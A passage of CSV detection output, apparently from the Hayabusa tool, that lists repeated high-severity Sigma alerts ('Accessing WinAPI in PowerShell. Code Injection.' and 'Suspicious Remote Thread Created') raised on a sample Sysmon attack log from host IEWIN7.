Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
